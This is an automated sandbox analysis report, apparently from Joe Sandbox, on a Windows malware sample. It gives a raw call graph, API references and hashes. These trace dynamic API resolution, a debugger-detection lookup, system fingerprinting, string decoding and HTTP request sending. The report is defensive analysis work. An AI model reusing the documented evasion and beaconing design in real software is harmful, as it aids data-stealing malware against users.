3042a6 26778->26779 26780 304a60 2 API calls 26779->26780 26781 3042bc 26780->26781 26782 304a60 2 API calls 26781->26782 26783 3042d2 26782->26783 26784 304a60 2 API calls 26783->26784 26785 3042e8 26784->26785 26786 304a60 2 API calls 26785->26786 26787 3042fe 26786->26787 26788 304a60 2 API calls 26787->26788 26789 304314 26788->26789 26790 304a60 2 API calls 26789->26790 26791 30432d 26790->26791 26792 304a60 2 API calls 26791->26792 26793 304343 26792->26793 26794 304a60 2 API calls 26793->26794 26795 304359 26794->26795 26796 304a60 2 API calls 26795->26796 26797 30436f 26796->26797 26798 304a60 2 API calls 26797->26798 26799 304385 26798->26799 26800 304a60 2 API calls 26799->26800 26801 30439b 26800->26801 26802 304a60 2 API calls 26801->26802 26803 3043b4 26802->26803 26804 304a60 2 API calls 26803->26804 26805 3043ca 26804->26805 26806 304a60 2 API calls 26805->26806 26807 3043e0 26806->26807 26808 304a60 2 API calls 26807->26808 26809 3043f6 26808->26809 26810 304a60 2 API calls 26809->26810 26811 30440c 26810->26811 26812 304a60 2 API calls 26811->26812 26813 304422 26812->26813 26814 304a60 2 API calls 26813->26814 26815 30443b 26814->26815 26816 304a60 2 API calls 26815->26816 26817 304451 26816->26817 26818 304a60 2 API calls 26817->26818 26819 304467 26818->26819 26820 304a60 2 API calls 26819->26820 26821 30447d 26820->26821 26822 304a60 2 API calls 26821->26822 26823 304493 26822->26823 26824 304a60 2 API calls 26823->26824 26825 3044a9 26824->26825 26826 304a60 2 API calls 26825->26826 26827 3044c2 26826->26827 26828 304a60 2 API calls 26827->26828 26829 3044d8 26828->26829 26830 304a60 2 API calls 26829->26830 26831 3044ee 26830->26831 26832 304a60 2 API calls 26831->26832 26833 304504 26832->26833 26834 304a60 2 API calls 26833->26834 26835 30451a 26834->26835 26836 304a60 2 API calls 26835->26836 26837 304530 26836->26837 26838 304a60 2 API calls 26837->26838 26839 304549 26838->26839 26840 304a60 2 API calls 26839->26840 26841 30455f 26840->26841 26842 304a60 2 API calls 26841->26842 26843 304575 26842->26843 26844 304a60 2 API calls 26843->26844 26845 30458b 26844->26845 26846 304a60 2 API calls 26845->26846 26847 3045a1 26846->26847 26848 304a60 2 API calls 26847->26848 26849 3045b7 26848->26849 26850 304a60 2 API calls 26849->26850 26851 3045d0 26850->26851 26852 304a60 2 API calls 26851->26852 26853 3045e6 26852->26853 26854 304a60 2 API calls 26853->26854 26855 3045fc 26854->26855 26856 304a60 2 API calls 26855->26856 26857 304612 26856->26857 26858 304a60 2 API calls 26857->26858 26859 304628 26858->26859 26860 304a60 2 API calls 26859->26860 26861 30463e 26860->26861 26862 304a60 2 API calls 26861->26862 26863 304657 26862->26863 26864 304a60 2 API calls 26863->26864 26865 30466d 26864->26865 26866 304a60 2 API calls 26865->26866 26867 304683 26866->26867 26868 304a60 2 API calls 26867->26868 26869 304699 26868->26869 26870 304a60 2 API calls 26869->26870 26871 3046af 26870->26871 26872 304a60 2 API calls 26871->26872 26873 3046c5 26872->26873 26874 304a60 2 API calls 26873->26874 26875 3046de 26874->26875 26876 304a60 2 API calls 26875->26876 26877 3046f4 26876->26877 26878 304a60 2 API calls 26877->26878 26879 30470a 26878->26879 26880 304a60 2 API calls 26879->26880 26881 304720 26880->26881 26882 304a60 2 API calls 26881->26882 26883 304736 26882->26883 26884 304a60 2 API calls 26883->26884 26885 30474c 26884->26885 26886 304a60 2 API calls 26885->26886 26887 304765 26886->26887 26888 304a60 2 API calls 26887->26888 26889 30477b 26888->26889 26890 304a60 2 API calls 26889->26890 26891 304791 26890->26891 26892 304a60 2 API calls 26891->26892 26893 3047a7 26892->26893 26894 304a60 2 API calls 26893->26894 26895 3047bd 26894->26895 26896 304a60 2 API calls 26895->26896 26897 3047d3 26896->26897 26898 304a60 2 API calls 26897->26898 26899 3047ec 26898->26899 26900 304a60 2 API calls 26899->26900 26901 304802 26900->26901 26902 304a60 2 API calls 26901->26902 26903 304818 26902->26903 26904 304a60 2 API calls 26903->26904 26905 30482e 26904->26905 26906 304a60 2 API calls 26905->26906 26907 304844 26906->26907 26908 304a60 2 API calls 26907->26908 26909 30485a 26908->26909 26910 304a60 2 API calls 26909->26910 26911 304873 26910->26911 26912 304a60 2 API calls 26911->26912 26913 304889 26912->26913 26914 304a60 2 API calls 26913->26914 26915 30489f 26914->26915 26916 304a60 2 API calls 26915->26916 26917 3048b5 26916->26917 26918 304a60 2 API calls 26917->26918 26919 3048cb 26918->26919 26920 304a60 2 API calls 26919->26920 26921 3048e1 26920->26921 26922 304a60 2 API calls 26921->26922 26923 3048fa 26922->26923 26924 304a60 2 API calls 26923->26924 26925 304910 26924->26925 26926 304a60 2 API calls 26925->26926 26927 304926 26926->26927 26928 304a60 2 API calls 26927->26928 26929 30493c 26928->26929 26930 304a60 2 API calls 26929->26930 26931 304952 26930->26931 26932 304a60 2 API calls 26931->26932 26933 304968 26932->26933 26934 304a60 2 API calls 26933->26934 26935 304981 26934->26935 26936 304a60 2 API calls 26935->26936 26937 304997 26936->26937 26938 304a60 2 API calls 26937->26938 26939 3049ad 26938->26939 26940 304a60 2 API calls 26939->26940 26941 3049c3 26940->26941 26942 304a60 2 API calls 26941->26942 26943 3049d9 26942->26943 26944 304a60 2 API calls 26943->26944 26945 3049ef 26944->26945 26946 304a60 2 API calls 26945->26946 26947 304a08 26946->26947 26948 304a60 2 API calls 26947->26948 26949 304a1e 26948->26949 26950 304a60 2 API calls 26949->26950 26951 304a34 26950->26951 26952 304a60 2 API calls 26951->26952 26953 304a4a 26952->26953 26954 3266e0 26953->26954 26955 326afe 8 API calls 26954->26955 26956 3266ed 43 API calls 26954->26956 26957 326b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26955->26957 26958 326c08 26955->26958 26956->26955 26957->26958 26959 326cd2 26958->26959 26960 326c15 8 API calls 26958->26960 26961 326cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26959->26961 26962 326d4f 26959->26962 26960->26959 26961->26962 26963 326de9 26962->26963 26964 326d5c 6 API calls 26962->26964 26965 326f10 26963->26965 26966 326df6 12 API calls 26963->26966 26964->26963 26967 326f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26965->26967 26968 326f8d 26965->26968 26966->26965 26967->26968 26969 326fc1 26968->26969 26970 326f96 GetProcAddress GetProcAddress 26968->26970 26971 326ff5 26969->26971 26972 326fca GetProcAddress GetProcAddress 26969->26972 26970->26969 26973 327002 10 API calls 26971->26973 26974 3270ed 26971->26974 26972->26971 26973->26974 26975 327152 26974->26975 26976 3270f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26974->26976 26977 32715b GetProcAddress 26975->26977 26978 32716e 26975->26978 26976->26975 26977->26978 26979 32051f 26978->26979 26980 327177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26978->26980 26981 301530 26979->26981 26980->26979 27290 301610 26981->27290 26983 30155d 26986 301577 lstrcpy 26983->26986 26987 30157f 26983->26987 26984 30153b 26984->26983 26985 301555 lstrcpy 26984->26985 26985->26983 26986->26987 26988 301599 lstrcpy 26987->26988 26990 3015a1 26987->26990 26988->26990 26989 301605 26992 31f1b0 lstrlen 26989->26992 26990->26989 26991 3015fd lstrcpy 26990->26991 26991->26989 26993 31f1e4 26992->26993 26994 31f1f7 lstrlen 26993->26994 26995 31f1eb lstrcpy 26993->26995 26996 31f208 26994->26996 26995->26994 26997 31f21b lstrlen 26996->26997 26998 31f20f lstrcpy 26996->26998 26999 31f22c 26997->26999 26998->26997 27000 31f233 lstrcpy 26999->27000 27001 31f23f 26999->27001 27000->27001 27002 31f258 lstrcpy 27001->27002 27003 31f264 27001->27003 27002->27003 27004 31f286 lstrcpy 27003->27004 27005 31f292 27003->27005 27004->27005 27006 31f2ba lstrcpy 27005->27006 27007 31f2c6 27005->27007 27006->27007 27008 31f2ea lstrcpy 27007->27008 27059 31f300 27007->27059 27008->27059 27009 31f30c lstrlen 27009->27059 27010 31f4b9 lstrcpy 27010->27059 27011 31f3a1 lstrcpy 27011->27059 27012 31f3c5 lstrcpy 27012->27059 27013 31f4e8 lstrcpy 27073 31f4f0 27013->27073 27014 31f479 lstrcpy 27014->27059 27015 31f59c lstrcpy 27015->27073 27016 31f70f StrCmpCA 27021 31fe8e 27016->27021 27016->27059 27017 31f616 StrCmpCA 27017->27016 27017->27073 27018 31fa29 StrCmpCA 27030 31fe2b 27018->27030 27018->27059 27019 31f73e lstrlen 27019->27059 27020 31fd4d StrCmpCA 27024 31fd60 Sleep 27020->27024 27035 31fd75 27020->27035 27022 31fead lstrlen 27021->27022 27023 31fea5 lstrcpy 27021->27023 27028 31fec7 27022->27028 27023->27022 27024->27059 27025 31fa58 lstrlen 27025->27059 27026 31f64a lstrcpy 27026->27073 27027 301530 8 API calls 27027->27073 27038 31fee7 lstrlen 27028->27038 27041 31fedf lstrcpy 27028->27041 27029 31fe4a lstrlen 27037 31fe64 27029->27037 27030->27029 27033 31fe42 lstrcpy 27030->27033 27031 31ee90 28 API calls 27031->27073 27032 31f89e lstrcpy 27032->27059 27033->27029 27034 31fd94 lstrlen 27049 31fdae 27034->27049 27035->27034 27039 31fd8c lstrcpy 27035->27039 27036 31f76f lstrcpy 27036->27059 27043 31fdce lstrlen 27037->27043 27046 31fe7c lstrcpy 27037->27046 27044 31ff01 27038->27044 27039->27034 27040 31fbb8 lstrcpy 27040->27059 27041->27038 27042 31fa89 lstrcpy 27042->27059 27056 31fde8 27043->27056 27050 31ff21 27044->27050 27057 31ff19 lstrcpy 27044->27057 27045 31f791 lstrcpy 27045->27059 27046->27043 27048 31f8cd lstrcpy 27048->27073 27049->27043 27053 31fdc6 lstrcpy 27049->27053 27058 301610 4 API calls 27050->27058 27051 31f698 lstrcpy 27051->27073 27052 31faab lstrcpy 27052->27059 27053->27043 27054 301530 8 API calls 27054->27059 27055 31fbe7 lstrcpy 27055->27073 27062 31fe08 27056->27062 27063 31fe00 lstrcpy 27056->27063 27057->27050 27076 31fe13 27058->27076 27059->27009 27059->27010 27059->27011 27059->27012 27059->27013 27059->27014 27059->27016 27059->27018 27059->27019 27059->27020 27059->27025 27059->27032 27059->27036 27059->27040 27059->27042 27059->27045 27059->27048 27059->27052 27059->27054 27059->27055 27061 31ee90 28 API calls 27059->27061 27065 31f7e2 lstrcpy 27059->27065 27068 31fafc lstrcpy 27059->27068 27059->27073 27060 31efb0 35 API calls 27060->27073 27061->27059 27064 301610 4 API calls 27062->27064 27063->27062 27064->27076 27065->27059 27066 31f924 lstrcpy 27066->27073 27067 31f99e StrCmpCA 27067->27018 27067->27073 27068->27059 27069 31fc3e lstrcpy 27069->27073 27070 31fcb8 StrCmpCA 27070->27020 27070->27073 27071 31f9cb lstrcpy 27071->27073 27072 31fce9 lstrcpy 27072->27073 27073->27015 27073->27017 27073->27018 27073->27020 27073->27026 27073->27027 27073->27031 27073->27051 27073->27059 27073->27060 27073->27066 27073->27067 27073->27069 27073->27070 27073->27071 27073->27072 27074 31fa19 lstrcpy 27073->27074 27075 31fd3a lstrcpy 27073->27075 27074->27073 27075->27073 27076->26100 27078 322785 27077->27078 27079 32278c GetVolumeInformationA 27077->27079 27078->27079 27080 3227ec GetProcessHeap RtlAllocateHeap 27079->27080 27082 322822 27080->27082 27083 322826 wsprintfA 27080->27083 27300 3271e0 27082->27300 27083->27082 27087 304c70 27086->27087 27088 304c85 27087->27088 27089 304c7d lstrcpy 27087->27089 27304 304bc0 27088->27304 27089->27088 27091 304c90 27092 304ccc lstrcpy 27091->27092 27093 304cd8 27091->27093 27092->27093 27094 304cff lstrcpy 27093->27094 27095 304d0b 27093->27095 27094->27095 27096 304d2f lstrcpy 27095->27096 27097 304d3b 27095->27097 27096->27097 27098 304d6d lstrcpy 27097->27098 27099 304d79 27097->27099 27098->27099 27100 304da0 lstrcpy 27099->27100 27101 304dac InternetOpenA StrCmpCA 27099->27101 27100->27101 27102 304de0 27101->27102 27103 3054b8 InternetCloseHandle CryptStringToBinaryA 27102->27103 27308 323e70 27102->27308 27104 3054e8 LocalAlloc 27103->27104 27121 3055d8 27103->27121 27106 3054ff CryptStringToBinaryA 27104->27106 27104->27121 27107 305517 LocalFree 27106->27107 27108 305529 lstrlen 27106->27108 27107->27121 27109 30553d 27108->27109 27111 305563 lstrlen 27109->27111 27112 305557 lstrcpy 27109->27112 27110 304dfa 27113 304e23 lstrcpy lstrcat 27110->27113 27114 304e38 27110->27114 27116 30557d 27111->27116 27112->27111 27113->27114 27115 304e5a lstrcpy 27114->27115 27118 304e62 27114->27118 27115->27118 27117 30558f lstrcpy lstrcat 27116->27117 27119 3055a2 27116->27119 27117->27119 27120 304e71 lstrlen 27118->27120 27122 3055d1 27119->27122 27124 3055c9 lstrcpy 27119->27124 27123 304e89 27120->27123 27121->26129 27122->27121 27125 304e95 lstrcpy lstrcat 27123->27125 27126 304eac 27123->27126 27124->27122 27125->27126 27127 304ed5 27126->27127 27128 304ecd lstrcpy 27126->27128 27129 304edc lstrlen 27127->27129 27128->27127 27130 304ef2 27129->27130 27131 304efe lstrcpy lstrcat 27130->27131 27132 304f15 27130->27132 27131->27132 27133 304f36 lstrcpy 27132->27133 27134 304f3e 27132->27134 27133->27134 27135 304f65 lstrcpy lstrcat 27134->27135 27136 304f7b 27134->27136 27135->27136 27137 304fa4 27136->27137 27138 304f9c lstrcpy 27136->27138 27139 304fab lstrlen 27137->27139 27138->27137 27140 304fc1 27139->27140 27141 304fcd lstrcpy lstrcat 27140->27141 27142 304fe4 27140->27142 27141->27142 27143 30500d 27142->27143 27144 305005 lstrcpy 27142->27144 27145 305014 lstrlen 27143->27145 27144->27143 27146 30502a 27145->27146 27147 305036 lstrcpy lstrcat 27146->27147 27148 30504d 27146->27148 27147->27148 27149 305079 27148->27149 27150 305071 lstrcpy 27148->27150 27151 305080 lstrlen 27149->27151 27150->27149 27152 30509b 27151->27152 27153 3050ac lstrcpy lstrcat 27152->27153 27154 3050bc 27152->27154 27153->27154 27155 3050da lstrcpy lstrcat 27154->27155 27156 3050ed 27154->27156 27155->27156 27157 30510b lstrcpy 27156->27157 27158 305113 27156->27158 27157->27158 27159 305121 InternetConnectA 27158->27159 27159->27103 27160 305150 HttpOpenRequestA 27159->27160 27161 3054b1 InternetCloseHandle 27160->27161 27162 30518b 27160->27162 27161->27103 27315 327310 lstrlen 27162->27315 27166 3051a4 27323 3272c0 27166->27323 27169 327280 lstrcpy 27170 3051c0 27169->27170 27171 327310 3 API calls 27170->27171 27172 3051d5 27171->27172 27173 327280 lstrcpy 27172->27173 27174 3051de 27173->27174 27175 327310 3 API calls 27174->27175 27176 3051f4 27175->27176 27177 327280 lstrcpy 27176->27177 27178 3051fd 27177->27178 27179 327310 3 API calls 27178->27179 27180 305213 27179->27180 27181 327280 lstrcpy 27180->27181 27182 30521c 27181->27182 27183 327310 3 API calls 27182->27183 27184 305231 27183->27184 27185 327280 lstrcpy 27184->27185 27186 30523a 27185->27186 27187 3272c0 2 API calls 27186->27187 27188 30524d 27187->27188 27189 327280 lstrcpy 27188->27189 27190 305256 27189->27190 27191 327310 3 API calls 27190->27191 27192 30526b 27191->27192 27193 327280 lstrcpy 27192->27193 27194 305274 27193->27194 27195 327310 3 API calls 27194->27195 27196 305289 27195->27196 27197 327280 lstrcpy 27196->27197 27198 305292 27197->27198 27199 3272c0 2 API calls 27198->27199 27200 3052a5 27199->27200 27201 327280 lstrcpy 27200->27201 27202 3052ae 27201->27202 27203 327310 3 API calls 27202->27203 27204 3052c3 27203->27204 27205 327280 lstrcpy 27204->27205 27206 3052cc 27205->27206 27207 327310 3 API calls 27206->27207 27208 3052e2 27207->27208 27209 327280 lstrcpy 27208->27209 27210 3052eb 27209->27210 27211 327310 3 API calls 27210->27211 27212 305301 27211->27212 27213 327280 lstrcpy 27212->27213 27214 30530a 27213->27214 27215 327310 3 API calls 27214->27215 27216 30531f 27215->27216 27217 327280 lstrcpy 27216->27217 27218 305328 27217->27218 27219 3272c0 2 API calls 27218->27219 27220 30533b 27219->27220 27221 327280 lstrcpy 27220->27221 27222 305344 27221->27222 27223 305370 lstrcpy 27222->27223 27224 30537c 27222->27224 27223->27224 27225 3272c0 2 API calls 27224->27225 27226 30538a 27225->27226 27227 3272c0 2 API calls 27226->27227 27228 305397 27227->27228 27229 327280 lstrcpy 27228->27229 27230 3053a1 27229->27230 27231 3053b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27230->27231 27232 30549c InternetCloseHandle 27231->27232 27236 3053f2 27231->27236 27233 3054ae 27232->27233 27233->27161 27234 3053fd lstrlen 27234->27236 27235 30542e lstrcpy lstrcat 27235->27236 27236->27232 27236->27234 27236->27235 27237 305473 27236->27237 27238 30546b lstrcpy 27236->27238 27239 30547a InternetReadFile 27237->27239 27238->27237 27239->27232 27239->27236 27241 318cc6 ExitProcess 27240->27241 27256 318ccd 27240->27256 27242 318ee2 27242->26131 27243 318d30 lstrlen 27243->27256 27244 318e56 StrCmpCA 27244->27256 27245 318d5a lstrlen 27245->27256 27246 318dbd StrCmpCA 27246->27256 27247 318ddd StrCmpCA 27247->27256 27248 318dfd StrCmpCA 27248->27256 27249 318e1d StrCmpCA 27249->27256 27250 318e3d StrCmpCA 27250->27256 27251 318d84 StrCmpCA 27251->27256 27252 318da4 StrCmpCA 27252->27256 27253 318d06 lstrlen 27253->27256 27254 318e88 lstrlen 27254->27256 27255 318e6f StrCmpCA 27255->27256 27256->27242 27256->27243 27256->27244 27256->27245 27256->27246 27256->27247 27256->27248 27256->27249 27256->27250 27256->27251 27256->27252 27256->27253 27256->27254 27256->27255 27257 318ebb lstrcpy 27256->27257 27257->27256 27258->26137 27259->26139 27260->26145 27261->26147 27262->26153 27263->26155 27264->26161 27265->26165 27266->26171 27267->26173 27268->26177 27269->26191 27270->26195 27271->26194 27272->26190 27273->26194 27274->26212 27275->26197 27276->26198 27277->26202 27278->26208 27279->26209 27280->26215 27281->26223 27282->26225 27283->26248 27284->26252 27285->26251 27286->26247 27287->26251 27288->26261 27291 30161f 27290->27291 27292 30162b lstrcpy 27291->27292 27293 301633 27291->27293 27292->27293 27294 30164d lstrcpy 27293->27294 27295 301655 27293->27295 27294->27295 27296 30166f lstrcpy 27295->27296 27297 301677 27295->27297 27296->27297 27298 301699 27297->27298 27299 301691 lstrcpy 27297->27299 27298->26984 27299->27298 27301 3271e6 27300->27301 27302 322860 27301->27302 27303 3271fc lstrcpy 27301->27303 27302->26126 27303->27302 27305 304bd0 27304->27305 27305->27305 27306 304bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27305->27306 27307 304c41 27306->27307 27307->27091 27309 323e83 27308->27309 27310 323e9f lstrcpy 27309->27310 27311 323eab 27309->27311 27310->27311 27312 323ed5 GetSystemTime 27311->27312 27313 323ecd lstrcpy 27311->27313 27314 323ef3 27312->27314 27313->27312 27314->27110 27317 32732d 27315->27317 27316 30519b 27319 327280 27316->27319 27317->27316 27318 32733d lstrcpy lstrcat 27317->27318 27318->27316 27320 32728c 27319->27320 27321 3272b4 27320->27321 27322 3272ac lstrcpy 27320->27322 27321->27166 27322->27321 27325 3272dc 27323->27325 27324 3051b7 27324->27169 27325->27324 27326 3272ed lstrcpy lstrcat 27325->27326 27326->27324 27358 3231f0 GetSystemInfo wsprintfA 27332 328471 121 API calls 2 library calls 27333 314c77 296 API calls 27348 31e0f9 140 API calls 27376 316b79 138 API calls 27335 308c79 strcpy_s 27367 31f2f8 93 API calls 27377 301b64 162 API calls 27386 30bbf9 90 API calls 27353 322d60 11 API calls 27378 322b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27364 311269 408 API calls 27336 305869 57 API calls 27337 322853 lstrcpy 27349 322cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27355 313959 244 API calls 27359 3101d9 126 API calls 27350 323cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27387 3233c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27380 318615 49 API calls 27339 31e049 147 API calls 27388 318615 48 API calls

                                  Executed Functions

                                  Function 00304C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00304C7F
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00304CD2
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00304D05
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00304D35
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00304D73
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00304DA6
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00304DB6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: c64507cd7c2f68ca940917f32581cbcff29bee4326041faf4c28326ea17e23de
                                  • Instruction ID: 697c3c5b77951d03ad933ab1541de5620eff7034776fa1ff37e5d41087b709a1
                                  • Opcode Fuzzy Hash: c64507cd7c2f68ca940917f32581cbcff29bee4326041faf4c28326ea17e23de
                                  • Instruction Fuzzy Hash: 20528F719126169BDB23EFA4DC99AAF77B9AF04300F054424F901AB291DF70ED46CBE0
                                  Function 00326390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2125 326390-3263bd GetPEB 2126 3265c3-326623 LoadLibraryA * 5 2125->2126 2127 3263c3-3265be call 3262f0 GetProcAddress * 20 2125->2127 2129 326625-326633 GetProcAddress 2126->2129 2130 326638-32663f 2126->2130 2127->2126 2129->2130 2132 326641-326667 GetProcAddress * 2 2130->2132 2133 32666c-326673 2130->2133 2132->2133 2134 326675-326683 GetProcAddress 2133->2134 2135 326688-32668f 2133->2135 2134->2135 2137 326691-32669f GetProcAddress 2135->2137 2138 3266a4-3266ab 2135->2138 2137->2138 2139 3266d7-3266da 2138->2139 2140 3266ad-3266d2 GetProcAddress * 2 2138->2140 2140->2139
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,01020558), ref: 003263E9
                                  • GetProcAddress.KERNEL32(75900000,01020810), ref: 00326402
                                  • GetProcAddress.KERNEL32(75900000,01020828), ref: 0032641A
                                  • GetProcAddress.KERNEL32(75900000,01020708), ref: 00326432
                                  • GetProcAddress.KERNEL32(75900000,01028B60), ref: 0032644B
                                  • GetProcAddress.KERNEL32(75900000,01016680), ref: 00326463
                                  • GetProcAddress.KERNEL32(75900000,010166E0), ref: 0032647B
                                  • GetProcAddress.KERNEL32(75900000,01020720), ref: 00326494
                                  • GetProcAddress.KERNEL32(75900000,01020750), ref: 003264AC
                                  • GetProcAddress.KERNEL32(75900000,010205A0), ref: 003264C4
                                  • GetProcAddress.KERNEL32(75900000,010207B0), ref: 003264DD
                                  • GetProcAddress.KERNEL32(75900000,01016980), ref: 003264F5
                                  • GetProcAddress.KERNEL32(75900000,010207C8), ref: 0032650D
                                  • GetProcAddress.KERNEL32(75900000,010205E8), ref: 00326526
                                  • GetProcAddress.KERNEL32(75900000,01016880), ref: 0032653E
                                  • GetProcAddress.KERNEL32(75900000,01020840), ref: 00326556
                                  • GetProcAddress.KERNEL32(75900000,01020570), ref: 0032656F
                                  • GetProcAddress.KERNEL32(75900000,010168A0), ref: 00326587
                                  • GetProcAddress.KERNEL32(75900000,01020618), ref: 0032659F
                                  • GetProcAddress.KERNEL32(75900000,010167E0), ref: 003265B8
                                  • LoadLibraryA.KERNEL32(01020588,?,?,?,00321C03), ref: 003265C9
                                  • LoadLibraryA.KERNEL32(01020600,?,?,?,00321C03), ref: 003265DB
                                  • LoadLibraryA.KERNEL32(010205B8,?,?,?,00321C03), ref: 003265ED
                                  • LoadLibraryA.KERNEL32(010205D0,?,?,?,00321C03), ref: 003265FE
                                  • LoadLibraryA.KERNEL32(01020630,?,?,?,00321C03), ref: 00326610
                                  • GetProcAddress.KERNEL32(75070000,01020648), ref: 0032662D
                                  • GetProcAddress.KERNEL32(75FD0000,01020678), ref: 00326649
                                  • GetProcAddress.KERNEL32(75FD0000,01028CB8), ref: 00326661
                                  • GetProcAddress.KERNEL32(75A50000,01028E80), ref: 0032667D
                                  • GetProcAddress.KERNEL32(74E50000,01016800), ref: 00326699
                                  • GetProcAddress.KERNEL32(76E80000,01028A60), ref: 003266B5
                                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 003266CC
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 003266C1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: bafddf9566a04b512aeb1c0e5f789bc930e4f329f52d34ff20d9fc10515ba606
                                  • Instruction ID: 249e89dd3f12e513be6a909c3df9eb3312a8ca8bbff09368a28ec6201e1bad0c
                                  • Opcode Fuzzy Hash: bafddf9566a04b512aeb1c0e5f789bc930e4f329f52d34ff20d9fc10515ba606
                                  • Instruction Fuzzy Hash: CFA16FF9A117009FD758DFA5EE8CA2677B9F7A87403008519F956C3360DBB4A908FB60
                                  Function 00321BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
